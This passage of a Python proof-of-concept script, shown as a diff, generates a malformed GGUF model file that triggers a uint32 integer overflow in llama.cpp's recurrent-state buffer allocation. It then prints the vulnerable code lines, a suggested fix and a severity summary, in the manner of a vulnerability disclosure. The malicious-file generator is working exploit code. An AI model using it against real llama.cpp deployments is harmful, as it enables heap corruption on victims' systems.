| 373 |
+
# A real exploit would need to provide full tensor data.
|
| 374 |
+
data_offset = 0
|
| 375 |
+
for name, ndims, shape, dtype in tensors:
|
| 376 |
+
write_gguf_string(f, name)
|
| 377 |
+
f.write(struct.pack('<I', ndims))
|
| 378 |
+
for dim in shape:
|
| 379 |
+
f.write(struct.pack('<Q', dim))
|
| 380 |
+
f.write(struct.pack('<I', dtype))
|
| 381 |
+
f.write(struct.pack('<Q', data_offset))
|
| 382 |
+
# Calculate actual data size for this tensor
|
| 383 |
+
n_elements = 1
|
| 384 |
+
for d in shape:
|
| 385 |
+
n_elements *= d
|
| 386 |
+
data_size = min(n_elements, 64) * 4 # f32 = 4 bytes, but we only store stub
|
| 387 |
+
# Align to 32 bytes
|
| 388 |
+
aligned_size = (data_size + 31) & ~31
|
| 389 |
+
data_offset += aligned_size
|
| 390 |
+
|
| 391 |
+
# Align to data alignment boundary (default 32)
|
| 392 |
+
current_pos = f.tell()
|
| 393 |
+
alignment = 32
|
| 394 |
+
padding = (alignment - (current_pos % alignment)) % alignment
|
| 395 |
+
f.write(b'\x00' * padding)
|
| 396 |
+
|
| 397 |
+
# Tensor data (stubs)
|
| 398 |
+
for data in tensor_data_list:
|
| 399 |
+
f.write(data.tobytes())
|
| 400 |
+
# Pad to 32-byte alignment
|
| 401 |
+
data_size = len(data) * 4
|
| 402 |
+
pad = (alignment - (data_size % alignment)) % alignment
|
| 403 |
+
f.write(b'\x00' * pad)
|
| 404 |
+
|
| 405 |
+
file_size = os.path.getsize(output_path)
|
| 406 |
+
print(f" Output: {output_path}")
|
| 407 |
+
print(f" File size: {file_size} bytes ({file_size/1024:.1f} KiB)")
|
| 408 |
+
print()
|
| 409 |
+
print(" NOTE: This GGUF file has correct overflow-inducing metadata but")
|
| 410 |
+
print(" truncated tensor data. The hparams will parse correctly and the")
|
| 411 |
+
print(" overflow will compute during context creation, but tensor loading")
|
| 412 |
+
print(" will fail due to insufficient data. A full exploit requires ~16GB")
|
| 413 |
+
print(" of tensor data (realistic for real model files).")
|
| 414 |
+
print()
|
| 415 |
+
return output_path
|
| 416 |
+
|
| 417 |
+
|
| 418 |
+
def generate_rwkv6_poc_gguf(output_path):
|
| 419 |
+
"""
|
| 420 |
+
Generate a minimal GGUF targeting RWKV6 architecture.
|
| 421 |
+
n_embd_s() = n_embd * wkv_head_size overflows to small value.
|
| 422 |
+
|
| 423 |
+
For RWKV6, wkv_head_size appears in tensor shape {head_size, n_embd/head_size},
|
| 424 |
+
requiring n_embd >= wkv_head_size. The minimum overflow case is:
|
| 425 |
+
n_embd = 65537, wkv_head_size = 65537
|
| 426 |
+
n_embd_s() = 65537 * 65537 = 4295098369 -> wraps to 131073 in uint32
|
| 427 |
+
|
| 428 |
+
However, tensors like time_mix_key {n_embd, n_embd} = {65537, 65537} require
|
| 429 |
+
~16GB, making a compact PoC file impractical.
|
| 430 |
+
"""
|
| 431 |
+
n_embd = 65537
|
| 432 |
+
wkv_head_size = 65537
|
| 433 |
+
n_layer = 1
|
| 434 |
+
n_vocab = 4
|
| 435 |
+
time_mix_extra_dim = 32
|
| 436 |
+
time_decay_extra_dim = 64
|
| 437 |
+
ffn_size = 4 # minimal feed-forward size
|
| 438 |
+
|
| 439 |
+
correct_n_embd_s = n_embd * wkv_head_size
|
| 440 |
+
overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)
|
| 441 |
+
|
| 442 |
+
correct_n_embd_r = 2 * n_embd # token_shift_count defaults to 2
|
| 443 |
+
overflowed_n_embd_r = uint32_overflow(correct_n_embd_r)
|
| 444 |
+
|
| 445 |
+
print(f"\n{'='*78}")
|
| 446 |
+
print("RWKV6 OVERFLOW ANALYSIS")
|
| 447 |
+
print(f"{'='*78}")
|
| 448 |
+
print(f" n_embd: {n_embd}")
|
| 449 |
+
print(f" wkv_head_size: {wkv_head_size}")
|
| 450 |
+
print(f" n_embd_s() correct: {correct_n_embd_s} ({correct_n_embd_s * 4 / (1024**3):.1f} GiB as f32)")
|
| 451 |
+
print(f" n_embd_s() overflowed: {overflowed_n_embd_s} ({overflowed_n_embd_s * 4 / (1024**2):.1f} MiB as f32)")
|
| 452 |
+
print(f" Buffer undersized by: {correct_n_embd_s / overflowed_n_embd_s:.0f}x")
|
| 453 |
+
print(f" n_embd_r() correct: {correct_n_embd_r} (no overflow)")
|
| 454 |
+
print()
|
| 455 |
+
|
| 456 |
+
# For RWKV6, key tensors and their sizes:
|
| 457 |
+
print(" Key tensor sizes (showing why full PoC file is large):")
|
| 458 |
+
print(f" token_embd {{n_embd, n_vocab}} = {{{n_embd}, {n_vocab}}} = {n_embd*n_vocab*4/(1024**2):.1f} MiB")
|
| 459 |
+
print(f" time_mix_key {{n_embd, n_embd}} = {{{n_embd}, {n_embd}}} = {n_embd*n_embd*4/(1024**3):.1f} GiB")
|
| 460 |
+
print(f" time_mix_first {{head_sz, n_embd/hs}} = {{{wkv_head_size}, {n_embd//wkv_head_size}}} = {wkv_head_size*(n_embd//wkv_head_size)*4/1024:.1f} KiB")
|
| 461 |
+
print()
|
| 462 |
+
|
| 463 |
+
# We don't actually create this file since the tensors would be huge.
|
| 464 |
+
# The Mamba PoC above demonstrates the GGUF structure.
|
| 465 |
+
print(" (RWKV6 GGUF file not generated -- tensor data would be ~16GB)")
|
| 466 |
+
print(" The vulnerability is the same code path as Mamba, just different parameters.")
|
| 467 |
+
|
| 468 |
+
|
| 469 |
+
def print_vulnerable_code():
|
| 470 |
+
"""Print the exact vulnerable code for reference."""
|
| 471 |
+
print(f"\n{'='*78}")
|
| 472 |
+
print("VULNERABLE CODE REFERENCES")
|
| 473 |
+
print(f"{'='*78}")
|
| 474 |
+
print("""
|
| 475 |
+
FILE: src/llama-hparams.cpp
|
| 476 |
+
|
| 477 |
+
Line 131-134 (n_embd_r for RWKV):
|
| 478 |
+
uint32_t llama_hparams::n_embd_r() const {
|
| 479 |
+
if (wkv_head_size != 0) {
|
| 480 |
+
return token_shift_count * n_embd; // OVERFLOW: uint32 * uint32
|
| 481 |
+
}
|
| 482 |
+
|
| 483 |
+
Line 137-139 (n_embd_r for LFM2):
|
| 484 |
+
if (n_shortconv_l_cache != 0) {
|
| 485 |
+
return n_embd * (n_shortconv_l_cache - 1); // OVERFLOW: uint32 * uint32
|
| 486 |
+
}
|
| 487 |
+
|
| 488 |
+
Line 152 (n_embd_r for Mamba):
|
| 489 |
+
return (ssm_d_conv > 0 ? ssm_d_conv - 1 : 0)
|
| 490 |
+
* (ssm_d_inner + 2*ssm_n_group*ssm_d_state); // OVERFLOW: multiple uint32 ops
|
| 491 |
+
|
| 492 |
+
Line 155-158 (n_embd_s for RWKV):
|
| 493 |
+
uint32_t llama_hparams::n_embd_s() const {
|
| 494 |
+
if (wkv_head_size != 0) {
|
| 495 |
+
return n_embd * wkv_head_size; // OVERFLOW: uint32 * uint32
|
| 496 |
+
}
|
| 497 |
+
|
| 498 |
+
Line 161-165 (n_embd_s for Kimi KDA):
|
| 499 |
+
if (n_embd_head_kda != 0) {
|
| 500 |
+
return n_embd_head_kda * n_embd_head_kda * n_head(); // OVERFLOW: triple uint32
|
| 501 |
+
|
| 502 |
+
Line 169 (n_embd_s for Mamba):
|
| 503 |
+
return ssm_d_state * ssm_d_inner; // OVERFLOW: uint32 * uint32
|
| 504 |
+
|
| 505 |
+
FILE: src/llama-memory-recurrent.cpp
|
| 506 |
+
|
| 507 |
+
Line 94-95 (allocation with overflowed size):
|
| 508 |
+
ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
|
| 509 |
+
ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);
|
| 510 |
+
// DOUBLE OVERFLOW: n_embd_r()/n_embd_s() returns uint32_t,
|
| 511 |
+
// multiplication with mem_size (uint32_t) can overflow AGAIN
|
| 512 |
+
// before widening to int64_t parameter of ggml_new_tensor_1d
|
| 513 |
+
|
| 514 |
+
FILE: src/llama-hparams.h
|
| 515 |
+
|
| 516 |
+
All overflow-prone fields are uint32_t (no validation, no range checks):
|
| 517 |
+
Line 44: uint32_t n_embd;
|
| 518 |
+
Line 62: uint32_t n_shortconv_l_cache = 0;
|
| 519 |
+
Line 99: uint32_t wkv_head_size = 0;
|
| 520 |
+
Line 100: uint32_t token_shift_count = 2;
|
| 521 |
+
Line 133: uint32_t ssm_d_conv = 0;
|
| 522 |
+
Line 134: uint32_t ssm_d_inner = 0;
|
| 523 |
+
Line 135: uint32_t ssm_d_state = 0;
|
| 524 |
+
Line 137: uint32_t ssm_n_group = 0;
|
| 525 |
+
Line 140: uint32_t n_embd_head_kda = 0;
|
| 526 |
+
""")
|
| 527 |
+
|
| 528 |
+
|
| 529 |
+
def print_fix_recommendation():
|
| 530 |
+
"""Print recommended fix."""
|
| 531 |
+
print(f"\n{'='*78}")
|
| 532 |
+
print("RECOMMENDED FIX")
|
| 533 |
+
print(f"{'='*78}")
|
| 534 |
+
print("""
|
| 535 |
+
The fix should address both the return type and the arithmetic:
|
| 536 |
+
|
| 537 |
+
1. Change n_embd_r() and n_embd_s() return types from uint32_t to uint64_t:
|
| 538 |
+
|
| 539 |
+
uint64_t llama_hparams::n_embd_r() const {
|
| 540 |
+
if (wkv_head_size != 0) {
|
| 541 |
+
return (uint64_t)token_shift_count * n_embd;
|
| 542 |
+
}
|
| 543 |
+
...
|
| 544 |
+
|
| 545 |
+
uint64_t llama_hparams::n_embd_s() const {
|
| 546 |
+
if (wkv_head_size != 0) {
|
| 547 |
+
return (uint64_t)n_embd * wkv_head_size;
|
| 548 |
+
}
|
| 549 |
+
...
|
| 550 |
+
|
| 551 |
+
2. Fix the allocation site in llama-memory-recurrent.cpp:
|
| 552 |
+
|
| 553 |
+
// Cast to int64_t before multiplying with mem_size
|
| 554 |
+
ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, (int64_t)hparams.n_embd_r() * mem_size);
|
| 555 |
+
ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, (int64_t)hparams.n_embd_s() * mem_size);
|
| 556 |
+
|
| 557 |
+
3. Add validation of hparams values after loading from GGUF:
|
| 558 |
+
|
| 559 |
+
// Validate that products won't cause unreasonable allocations
|
| 560 |
+
uint64_t embd_s = (uint64_t)ssm_d_state * ssm_d_inner;
|
| 561 |
+
if (embd_s > INT32_MAX) {
|
| 562 |
+
throw std::runtime_error("ssm state size overflow");
|
| 563 |
+
}
|
| 564 |
+
""")
|
| 565 |
+
|
| 566 |
+
|
| 567 |
+
def main():
|
| 568 |
+
print("=" * 78)
|
| 569 |
+
print("PoC: uint32_t Integer Overflow in llama_hparams::n_embd_s() / n_embd_r()")
|
| 570 |
+
print("Target: llama.cpp GGUF model loading (recurrent state buffer allocation)")
|
| 571 |
+
print("=" * 78)
|
| 572 |
+
|
| 573 |
+
# Analyze all overflow scenarios
|
| 574 |
+
analyze_overflow_scenarios()
|
| 575 |
+
|
| 576 |
+
# Print vulnerable code references
|
| 577 |
+
print_vulnerable_code()
|
| 578 |
+
|
| 579 |
+
# Generate Mamba PoC GGUF
|
| 580 |
+
poc_dir = os.path.dirname(os.path.abspath(__file__))
|
| 581 |
+
mamba_poc_path = os.path.join(poc_dir, "poc_mamba_overflow.gguf")
|
| 582 |
+
generate_mamba_poc_gguf(mamba_poc_path)
|
| 583 |
+
|
| 584 |
+
# Analyze RWKV6 overflow
|
| 585 |
+
generate_rwkv6_poc_gguf(None)
|
| 586 |
+
|
| 587 |
+
# Print fix recommendation
|
| 588 |
+
print_fix_recommendation()
|
| 589 |
+
|
| 590 |
+
print(f"\n{'='*78}")
|
| 591 |
+
print("SUMMARY")
|
| 592 |
+
print(f"{'='*78}")
|
| 593 |
+
print("""
|
| 594 |
+
VULNERABILITY: Integer overflow in n_embd_s()/n_embd_r() (uint32_t arithmetic)
|
| 595 |
+
|
| 596 |
+
IMPACT: Heap buffer overflow via undersized recurrent state allocation.
|
| 597 |
+
- Attacker crafts GGUF with metadata values whose product exceeds 2^32
|
| 598 |
+
- n_embd_s()/n_embd_r() silently wraps to a small value
|
| 599 |
+
- Small buffer is allocated for recurrent state
|
| 600 |
+
- During inference, full-sized state data is written to undersized buffer
|
| 601 |
+
- Results in heap-buffer-overflow (detectable by ASan)
|
| 602 |
+
|
| 603 |
+
SEVERITY: High
|
| 604 |
+
- Triggered by loading a malicious GGUF file (no special flags needed)
|
| 605 |
+
- Affects all recurrent architectures: Mamba, Mamba2, RWKV6, RWKV7, LFM2, Kimi
|
| 606 |
+
- No input validation on the overflow-prone metadata fields
|
| 607 |
+
- Overflow is in model loading path, not just inference
|
| 608 |
+
|
| 609 |
+
ROOT CAUSE: uint32_t return type and arithmetic in n_embd_s()/n_embd_r()
|
| 610 |
+
combined with lack of validation on GGUF metadata values.
|
| 611 |
+
|
| 612 |
+
AFFECTED CODE:
|
| 613 |
+
- src/llama-hparams.cpp: lines 134, 139, 146, 152, 158, 165, 169
|
| 614 |
+
- src/llama-memory-recurrent.cpp: lines 94-95
|
| 615 |
+
- src/llama-hparams.h: uint32_t field declarations (no range checks)
|
| 616 |
+
""")
|
| 617 |
+
|
| 618 |
+
|
| 619 |
+
if __name__ == "__main__":
|
| 620 |
+
main()
|